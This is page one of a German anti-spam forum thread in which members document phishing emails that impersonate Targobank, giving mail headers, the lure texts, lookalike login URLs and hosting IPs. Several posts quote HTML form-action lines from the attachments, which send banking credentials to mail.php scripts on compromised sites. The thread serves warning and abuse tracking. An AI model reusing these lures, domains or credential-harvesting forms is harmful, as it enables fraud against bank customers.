Seite 1 von 4 123 ... LetzteLetzte
Ergebnis 1 bis 10 von 38

Thema: Targo Bank phishing

  1. #1
    Urgestein
    Registriert seit
    18.07.2005
    Beiträge
    7.973

    Standard Targo Bank phishing

    Mein altbekannter Phishki mit dem Form-Skript im HTML-Anhang:


    header:
    01: Received: from lindner.vds.internetx.de ([85.236.36.215]) by mx-ha.gmx.net
    02: (mxgmx012) with ESMTPS (Nemesis) ID: [ID filtered]
    03: Received: (qmail 5945 invoked from network); 23 Aug 2013 xx:xx:xx +0200
    04: Received: from 208-40-110-196.ipv4.firstcomm.com (HELO User) (208.40.110.196) by
    05: 215-36-236-85.rev.customer-net.de with SMTP; 23 Aug 2013 xx:xx:xx +0200

    Aktualisierung Ihres Telefon-Banking PINs

    Sehr geehrte Kundin,
    sehr geehrter Kunde,

    Unser Sicherheitssystem hat einen Fehler im Telefonbanking gemeldet.
    Um unser Telefonbanking noch sicherer zu machen und missnbräuchliche
    Verwendungen zu vermeiden,
    ist eine Aktualisierung Ihres Telefonbanking-PIN notwendig.

    Ihrenen Telefon-Banking-PIN können Sie hier ändern, gehen Sie wie folgt vor.

    1. Öffnen Sie die Datei in Ihrem Emailanhang und wählen Sie "öffnen mit"
    aus!
    2. Füllen Sie alle Daten aus in klicken Sie dann auf "Verifizieren"!

    Mit freundlichen Grüßen

    Peter Herrmann
    Sicherheitsteam Telefonbanking
    Targo Bank
    Im Anhang:

    [HTML]<form action="http://capital95.com.br/css/.../mail.php" name="bloc_ident" autocomplete="off" method="post">[/HTML]

    IP: 184.154.122.74 ---> SINGLEHOP
    mein Credo: die 10 größten ROKSO-Spammer aus dem Verkehr gezogen, und 80 % des weltweiten Spam-Problems hätte sich mit einem Schlag erledigt....
    Ausserdem fordere ich die Abschaffung aller Affiliate-Programme, da mir bis heute niemand ein 100 % seriöses Affiliate-Programm benennen konnte.

  2. #2
    Urgestein
    Registriert seit
    18.07.2005
    Beiträge
    7.973

    Standard

    neuer Anlauf der Russenmafia:

    whois:http://bgw.mr8.de/images/icons/smile/x/mail.php

    IP: 176.9.27.148 ---> Hetzner

    Hetzner mal wieder. Bürgt mittlerweile für allerbeste deutsche Schwarzhut-Qualität.
    mein Credo: die 10 größten ROKSO-Spammer aus dem Verkehr gezogen, und 80 % des weltweiten Spam-Problems hätte sich mit einem Schlag erledigt....
    Ausserdem fordere ich die Abschaffung aller Affiliate-Programme, da mir bis heute niemand ein 100 % seriöses Affiliate-Programm benennen konnte.

  3. #3
    Mittwoch
    Gast

    Standard

    Zur Offtopic-Diskussion über die Servicequalität des Hosters Hetzner geht es hier entlang *klick*.

  4. #4
    Urgestein
    Registriert seit
    18.07.2005
    Beiträge
    7.973

    Standard

    Wieder mal, diesmal Joomla gecrackt:


    header:
    01: Received: from mail.bsdinfo.ru ([78.107.252.101]) by mx-ha.gmx.net (mxgmx008)
    02: with ESMTPS (Nemesis) ID: [ID filtered]
    03: Received: from User (p5099b9f7.dip0.t-ipconnect.de [80.153.185.247]) by
    04: mail.bsdinfo.ru (Postfix) with ESMTPA ID: [ID filtered]

    Sehr geehrte(r) Kunde(in),

    Als Sicherheitsmaßnahme müssen wir Ihre Daten aus Online-Banking
    überprüfen.
    Bitte bestätigen Sie Ihre Zugangsdaten einmalig.
    Anschließend können Sie sich wieder wie gewohnt mit Ihren Zugangsdaten
    anmelden.

    Gehen Sie wie folgt vor.

    1. Öffnen Sie die Datei in Ihrem Emailanhang und wählen Sie "öffnen mit"
    aus!
    2. Füllen Sie alle Daten aus in klicken Sie dann auf "Verifizieren"!

    Mit freundlichen Grüßen
    Targo Bank
    im HTML-Anhang:

    [HTML]<form id="GoSuivant" action="http://biok.cz/language/x/mail.php" method="post" onsubmit="return validate2(this)">[/HTML]

    IP: 87.118.106.220 ---> ns.km10532-05.keymachine.de
    mein Credo: die 10 größten ROKSO-Spammer aus dem Verkehr gezogen, und 80 % des weltweiten Spam-Problems hätte sich mit einem Schlag erledigt....
    Ausserdem fordere ich die Abschaffung aller Affiliate-Programme, da mir bis heute niemand ein 100 % seriöses Affiliate-Programm benennen konnte.

  5. #5
    Urgestein
    Registriert seit
    18.07.2005
    Beiträge
    7.973

    Standard

    Die altbekannte Ganoven, diesmal mit doppelt verschlüsseltem HTML-Anhang:


    header:
    01: Received: from mir3web.iboard.net.ua (mir3web.iboard.net.ua [77.87.40.67])
    02: (using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
    03: (No client certificate requested)
    04: by xxxxx (Postfix) with ESMTPS ID: [ID filtered]
    05: for xxxxx; Thu, 31 Oct 2013 xx:xx:xx +0100 (CET)
    06: Received: from [213.177.225.235] (helo=User)
    07: by mir3web.iboard.net.ua with esmtpa (Exim 4.80.1 (FreeBSD))
    08: (envelope-from <direkt [at] targobank.de>)
    09: ID: [ID filtered]

    IP: 213.177.225.235 ---> 213.177.225.235.adsl.griffin.net.uk

    Guten Tag,

    Unser System hat festgestellt, dass Ihr Telefon-Banking PIN aus
    Sicherheitsgründen
    geändert werden muss. Bitte benutzen Sie dieses Formular
    um die Änderung Ihres Telefon-Banking PIN kostenfrei zu ändern.

    Andernfalls müssen wir Ihr Konto mit 14,99€ belasten
    und die Änderung schriftlich über den Postweg bei Ihnen einfordern.

    Ihren Telefon-Banking PIN können Sie
    hier
    oder wie folgt ändern:

    1. Laden Sie die angehängte Datei und füllen Sie es. Wenn tut man nicht
    downloaden es bitte
    Öffnen Sie die Datei in Ihrem Emailanhang und wählen Sie "öffnen
    mit" aus!
    2. Füllen Sie alle Daten aus und klicken Sie dann auf "Bestätigen"!
    3. Ihr Telefon-Banking PIN aktiviert sich nach 5-7 Werktagen!
    4. Weil wir ein hohes Maß an Daten-Verschlüsselung verwenden, wenn Sie
    Internet
    Explorer verwenden,
    um die Sicherheit zu öffnen, müssen Sie auf dem Pop-up erscheint,
    klicken
    Sie, und wählen Sie
    erlauben Inhalt.

    Für weitere Fragen steht unser Online Support unter direkt@targobank.de
    24Std.
    für Sie zur Verfügung.


    Mit freundlichen Grüßen

    TARGOBANK
    Als Anhang dann eine Dokument.htm, die in der URL whois:http://agnor.gamedev-pt.net enthält.

    IP: 207.45.188.242 ---> zero.securenet-server.net

    Die Domain ist anscheinend bei aktuellen Virenwächtern schon einschlägig bekannt.
    mein Credo: die 10 größten ROKSO-Spammer aus dem Verkehr gezogen, und 80 % des weltweiten Spam-Problems hätte sich mit einem Schlag erledigt....
    Ausserdem fordere ich die Abschaffung aller Affiliate-Programme, da mir bis heute niemand ein 100 % seriöses Affiliate-Programm benennen konnte.

  6. #6
    Urgestein
    Registriert seit
    18.07.2005
    Beiträge
    7.973

    Standard

    Wieder die altbekannten Ganoven, diesmal Wordpress gecrackt:


    header:
    01: Return-Path: office [at] targobank.de
    02: Received: from s16.wlserver.nl ([193.23.143.167]) by mx-ha.gmx.net (mxgmx112)
    03: with ESMTPS (Nemesis) ID: [ID filtered]
    04: Received: from [72.248.96.246] (helo=User) by s16.wlserver.nl with esmtpa (Exim
    05: 4.80.1) (envelope-from <office [at] targobank.de>) ID: [ID filtered]

    Sehr geehrter Kunde,

    ----------------------------------------------------------------------------------------

    Wir haben eine unregelmäßige Aktivität ihrer TargoBank Konto erkannt.
    Zu Ihrem eigenen Schutz müssen wir diesen Vorgang überprüfen
    und Ihre TargoBank Konto vorläufig eingeschränken. Bitte laden Sie das
    Dokument im eMail Anhang und überprüfen Sie Ihre Daten. Sollte
    Sie diese eMail ignorieren wird Ihre Konto vorübergehend gesperrt.

    -----------------------------------------------------------------------------------------

    Bitte beachten Sie, dass die Benutzung der Website durch Sie informiert
    bleiben
    TargoBank
    Nutzen Sie die Gelegenheit, unser Unternehmen und Reserven.

    Danke,
    Kundendienst.

    © 2014 Targo Bank AG
    Im HTML-Anhang wieder das Skript:

    [HTML]<form id="GoSuivant" action="http://habbab.com.tr/wp-includes/images/wlw/.1/mail.php"
    method="post" onsubmit="return validate2(this)">[/HTML]

    IP: 217.195.198.8 ---> ns1.realsunucu.com, Türkei
    mein Credo: die 10 größten ROKSO-Spammer aus dem Verkehr gezogen, und 80 % des weltweiten Spam-Problems hätte sich mit einem Schlag erledigt....
    Ausserdem fordere ich die Abschaffung aller Affiliate-Programme, da mir bis heute niemand ein 100 % seriöses Affiliate-Programm benennen konnte.

  7. #7
    Urgestein
    Registriert seit
    18.07.2005
    Beiträge
    7.973

    Standard

    Und wieder mal:


    header:
    01: Received: from mail.donajimena.es ([213.96.188.133]) by mx-ha.gmx.net
    02: (mxgmx105) with ESMTP (Nemesis) ID: [ID filtered]
    03: Received: from server88-208-193-173.live-servers.net (unknown [88.208.193.173])
    04: by mail.donajimena.es (Postfix) with ESMTP ID: [ID filtered]

    =========================================
    TARGOBANK.de - eMail für xxxxx@gmx.de
    =========================================

    Der Status ihrer Transaktion wurde verändert

    und erfordert nun ihre Aufmerksamkeit.

    =========================================================================
    Nutzen Sie bitte den unten stehenden Link und loggen Sie sich in Ihr
    Konto ein,

    um alle offenen Fragen zu klären.

    whois:http://www.targobank.de.vili.cz/de/online-banking/login.cgi?login=true
    =========================================================================

    Diese Nachricht ist eine automatisierte Mitteilung,
    die von unserem System gesendet wurde.

    Bitte antworten Sie nicht auf diese eMail.
    ==============================================
    Copyright (C) TARGOBANK AG and Co. KGaA 2014
    ==============================================
    IP: 93.91.54.3 ---> inet4 housing, CZ

    weiter auf:

    whois:http://89.208.152.175/de/online-banking/login.cgi ---> Digital Network Hosting Department, Russia
    mein Credo: die 10 größten ROKSO-Spammer aus dem Verkehr gezogen, und 80 % des weltweiten Spam-Problems hätte sich mit einem Schlag erledigt....
    Ausserdem fordere ich die Abschaffung aller Affiliate-Programme, da mir bis heute niemand ein 100 % seriöses Affiliate-Programm benennen konnte.

  8. #8
    Mitglied Avatar von Speedy56
    Registriert seit
    03.11.2011
    Ort
    SouthBavaria
    Beiträge
    213

    Standard

    Heute auch bei mir aufgeschlagen.

    Allerdings ist
    TARGOBANK.de - eMail für xxxxx@gmx.de
    in keinster Weise meine Mailadresse.
    Wer wohl auf so was reinfällt - wenigstens das sollte stimmen, wenn ich schon kein Konto dort habe...
    „Man muss dem Leben immer um mindestens einen Whisky voraus sein“ (Humphrey Bogart)

  9. #9
    Urgestein
    Registriert seit
    18.07.2005
    Beiträge
    7.973

    Standard

    Neuer Anlauf, wieder mit nicht zutreffender Mail-Adresse. Anscheinend ist die Ratware zu blöd und nimmt immer die erste Adresse aus der Spam-Liste. Jetzt ist Amazon dran:

    whois:http://54.244.122.252:8080/de/online-banking/login.cgi ---> ec2-54-244-122-252.us-west-2.compute.amazonaws.com
    mein Credo: die 10 größten ROKSO-Spammer aus dem Verkehr gezogen, und 80 % des weltweiten Spam-Problems hätte sich mit einem Schlag erledigt....
    Ausserdem fordere ich die Abschaffung aller Affiliate-Programme, da mir bis heute niemand ein 100 % seriöses Affiliate-Programm benennen konnte.

  10. #10
    Mitglied Avatar von madman70
    Registriert seit
    09.05.2012
    Ort
    Filderstadt
    Beiträge
    108

    Standard

    Hui - eine Mail in feiner Yoda-Grammatik

    Schad, dass ich bei der Targo-Bank gar kein Konto habe...


    =========================================
    TARGOBANK.de - eMail für xxxxx@gmx.de (<- übrigens falsch)
    =========================================

    Während der Wartung der System einige Konten blockiert wurden.

    =========================================================================
    Bitte melden Sie sich an und aktivieren Sie wieder, wenn nötig.

    Nutzen Sie bitte den unten stehenden Link und loggen Sie sich in Ihr Konto ein.

    whois:http://www.targobank.de.pracuji.eu/de/online-banking/login.cgi?login=true
    =========================================================================

    Diese Nachricht ist eine automatisierte Mitteilung,

    Bitte antworten Sie nicht auf diese eMail.
    ==============================================
    Copyright (C) TARGOBANK AG and Co. KGaA 2014
    ==============================================

    Und hier noch ein Header dazu:


    header:
    01: Return-Path: code [at] google.com
    02: Received: from s228-204.furanet.com ([195.78.228.204]) by mx-ha.web.de
    03: (mxweb105) with ESMTP (Nemesis) ID: [ID filtered]
    04: <xxxxx [at] web.de>; Sun, 23 Feb 2014 xx:xx:xx +0100
    05: Received: (qmail 22272 invoked by UID: [UID filtered]
    06: Received: from 77.246.165.93 by s228-204 (envelope-from <code [at] google.com>, UID:
    07: [UID filtered]
    08: (
    09: Clear:RC:0(77.246.165.93):SA:0(-7.1/4.0):.
    10: Processed in 2.085385 secs); 23 Feb 2014 xx:xx:xx -0000
    11: X-Spam-Status: No, hits=-7.1 required=4.0
    12: X-Spam-Checker-Version: SpamAssassin 3.2.5 (2008-06-10) on s228-204.furanet.com
    13: X-Spam-Level:
    14: X-Spam-Status: No, score=-7.1 required=4.0 tests=AWL,BAYES_00,RDNS_NONE,
    15: SPF_SOFTFAIL,TVD_RCVD_IP,TVD_RCVD_IP4 autolearn=no version=3.2.5
    16: X-Envelope-From: code [at] google.com
    17: Received: from 77.246.165.93 by s228-204 (envelope-from <code [at] google.com>, UID:
    18: [UID filtered]
    19: (
    20: Clear:RC:0(77.246.165.93):.
    21: Processed in 0.146288 secs); 23 Feb 2014 xx:xx:xx -0000
    22: Received: from unknown (HELO VS10319) (77.246.165.93)
    23: by 91.192.108.204 with SMTP; 23 Feb 2014 xx:xx:xx -0000
    24: To: poor [at] spamvictim.tld
    25: From: Konten [at] Targobank.de
    26: Reply-to: no_reply [at] targobank.de
    27: Subject: Dringende Nachricht von Ihre Targobank Kundenbetreuer.
    28: Date: Sun, 23 Feb 2014 xx:xx:xx +0000

Seite 1 von 4 123 ... LetzteLetzte

Lesezeichen

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •  
Partnerlink:
REDDOXX Anti-Spam Lösungen